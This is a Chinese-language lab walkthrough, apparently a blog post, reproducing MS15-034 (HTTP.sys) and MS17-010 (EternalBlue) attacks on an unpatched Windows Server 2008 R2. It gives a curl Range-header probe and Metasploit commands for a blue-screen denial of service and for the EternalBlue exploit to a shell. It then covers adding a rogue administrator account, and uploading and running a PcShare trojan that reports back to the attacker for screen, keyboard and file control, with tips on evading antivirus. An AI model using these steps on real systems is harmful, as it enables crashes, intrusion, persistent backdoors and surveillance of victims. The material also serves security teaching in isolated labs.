漏洞复现:CVE-2015-1635、CVE-2017-0144

目录

CVE-2015-1635-HTTP.SYS 远程执行代码漏洞

环境准备(Win2008 R2 + IIS + kali)

安装系统与配置 IIS

安装 Windows Server 2008 R2(未打补丁)

安装 IIS 服务(默认开启 HTTP.sys)

查看系统版本(PowerShell 或 CMD 查看版本)

msf漏洞利用

kali返回数据包判断是否存在ms15_034

msf寻找漏洞

搜索模块

选择payload模块

设置目标IP

开始读取内存信息

dos攻击模块

CVE-2017-0144(MS17-010)网络服务器攻击

搜索漏洞可利用的模块

选择模块

查看攻击参数

开始攻击

得到shell

创建用户

添加为管理员

pcshare生成木马远程控制

成功上线


仅供学习参考,其他与作者无关

CVE-2015-1635-HTTP.SYS 远程执行代码漏洞

在 2015 年 4 月安全补丁日,微软发布的众多安全更新中,修复了 HTTP.sys 中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。

漏洞编号:CVE-2015-1635
微软通告:MS15-034
漏洞组件:HTTP.sys
影响系统:
Windows 7/8
Windows Server 2008 R2
Windows Server 2012 / R2(默认开启 IIS)
漏洞影响:
拒绝服务(DoS)— 立即蓝屏
潜在远程代码执行(复杂但存在)

攻击者可通过向启用IIS的服务器发送特制的Range请求,造成系统崩溃甚至远程执行代码,无需认证即可发起攻击。微软已通过KB3042553补丁修复此漏洞。

环境准备(Win2008 R2 + IIS + kali)

安装系统与配置 IIS

安装 Windows Server 2008 R2(未打补丁)

两台机器在同一网络(可通信)。可以互相ping通

安装 IIS 服务(默认开启 HTTP.sys)

服务器管理器 → 角色 → 添加角色 → Web Server(IIS)

 

 

查看系统版本(PowerShell 或 CMD 查看版本)

(Get-Item "C:\Windows\System32\drivers\HTTP.sys").VersionInfo | Format-List

6.1.7601.18798 或更高,表示已修复

 

版本为:6.1.7600.16385,所以存在该漏洞。

msf漏洞利用

kali返回数据包判断是否存在ms15_034

curl -v 192.168.2.153 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"

部分

含义

curl

使用 curl 工具发起一个 HTTP 请求

-v

启用 verbose 模式(详细模式),显示请求和响应的头信息,便于调试

192.168.2.153

目标 IP 地址,默认端口是 80(HTTP)

-H "Host:irrelevant"

添加 HTTP 头部,伪造 Host 字段为 "irrelevant"(此值不影响漏洞触发)

-H "Range:bytes=0-18446744073709551615"关键部分:构造 异常范围请求,试图从第 0 字节读到  字节,这是远超正常范围的非法请求,会触发 HTTP.sys 的整数溢出漏洞2^64 - 1

 

如果出现416和Requested Range Not Satisfiable,则证明存在漏洞,反之,则不存在

msf寻找漏洞

搜索模块

msfconsole
msf6>search MS15-034

 

发现该漏洞有可利用的模块,

选择payload模块

选择payload模块,带有sanner的是验证模块,带有dos的是攻击模块:, 在 kali 系统,借助 metasploit 平台利用 ms15-034 漏洞读取服务器内存数据,这是获取内存信息的工具use 1

设置目标IP

看一下这个模块需要配置什么

show options

 

发现我们只需要设置目标ip就可以啦

set rhosts 目标ip

 

开始读取内存信息

 

但它在大多数环境下并不能真正实现“读取任意内存”的效果

dos攻击模块

利用 ms15-034 漏洞进行 ddos 攻击,同样借助 metasploit 平台

msf6>use auxiliary/dos/http/ms15_034_ulonglongadd
Msf6 auxiliary > set rhosts 目标ip
Msf6 auxiliary >   set  threads 10    (把攻击线程数设置成 10 个)
Threads => 10
Msf6 auxiliary > run

 

 

攻击开始后,win7 或 win2008 瞬间蓝屏然后自动重启(win7 肯定蓝屏重启,win2008 有时不成功,不蓝屏),截图如下,win2008已经自动重启了:

再run攻击一次就开始蓝屏

 

漏洞修复,打补丁,微软官方网站有提供的,这是最可靠的方式,或者执行如下动作:禁用 IIS 内核缓存(可能 会降低 IIS 性能)

CVE-2017-0144(MS17-010)网络服务器攻击

MS17-010 是一个严重的 Windows 漏洞,影响包括 Windows Server 2008 在内的多个版本,允许远程执行代码。它在 2017 年被披露,并被广泛用于“永恒之蓝”(EternalBlue)攻击

CVE名称:CVE-2017-0144
公开时间:2017年3月14日(MS17-010 公告发布)
影响系统:
Windows Vista / 7 / 8 / 10
Windows Server 2008 / 2012 / 2016
漏洞类型:SMBv1 远程代码执行(RCE)
利用方式:无需认证、可远程利用、使用端口 445(SMB)
nmap -p445 --script smb-vuln-ms17-010 192.168.2.153

 

可以使用 EternalBlue(Metasploit)对该主机进行漏洞利用(获得 shell)。

搜索漏洞可利用的模块

 

搜索出来好几个 ms17-010,到底哪个是攻击漏洞,我们要根据提示信息和手动验证的方式来验证,一般 exploit 开头的都是直接渗透攻击的工具,也就是在这里面选。路径中的 smb 表示服务的意思

选择模块

use exploit/windows/smb/ms17_010_eternalblue 或者 use 0
info         //查看漏洞的信息

 

 

查看攻击参数

show options

 

指定 RHOST(remote host 靶机)和 LHOST(操作 机)。

 

当我们找到并 use 这个 msf17-010 漏洞的时候,其实 msf 就帮你指定好了这个木马,不需要我们再自己 set 了,所以这个指令不需要执行。记得关闭目标主机的防火墙,或者给防火墙添加一些端口出入规则,不然攻击可能会失败。并且查看一下是否打了最新的补丁,如果打了最新的补丁,那也是攻击失败的

 

开始攻击

 

得到shell

shell

 

查看用户

net user

发现中文乱码chcp 65001

创建用户

net user

 

 

添加为管理员

net localgroup administrators 22w4hyq /add

 

 

pcshare生成木马远程控制

我们上传一个远程桌面控制木马程序,pcshare 双击打开 PcShare.exe,然后点击弹框中的取消按钮 点击生成客户

 

 

查看当前打开 pcshare 工具的主机,在物理机打开的,物理机的 ip 的地址要填写在上面的弹框中,表示将来的木马程序将目标主机的数据发送给当前物理机的 pcshare 工具上点击生成,会弹出如下窗口,它自动生成了一个木马程序,先保存下来,文件名称随便写。

注意,有可能被杀毒软件杀掉,因为是木马程序,所以要选择一个保存到一个设置了免杀的目录中去,比如 tools 文件夹(或这个时候关闭杀毒软件)。

 

先退出shelleixt

 

接着将生成的 muma.exe 文件上传到 kali 主机上,比如上传到了/root 目录下面。最后将上传到 kali 上的 muma.exe 程序文件上传到目标主机上,上传到目标的 c 盘根目录中。

upload /root/muma.exe C:

 

 

接下来通过 kali 的 msf,远程执行一下这个文件,提示如下进程建立,表示运行成功了。

execute -f c:\\muma.exe

 

然后再去被攻击机看一下,这个文件运行成功之后,这个文件就消失了,其实是隐藏到某个驱动当中去了。然后看一下我们自己本机的 pcshare 工具窗口,等待一下之后,就看到有内容产生了。

注意:一定要先关闭自己本机的防火墙,不然 muma.exe 程序没办法连接上你的 pcshare 工具。

这就拿到了目标主机的所有操作,这里我们可以进行屏幕监控、保存屏幕录像、文件管理、进程管理、键盘管控(这个功能没试过)、注册表管理、音视频监控、窗口管理等等

 

成功上线

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值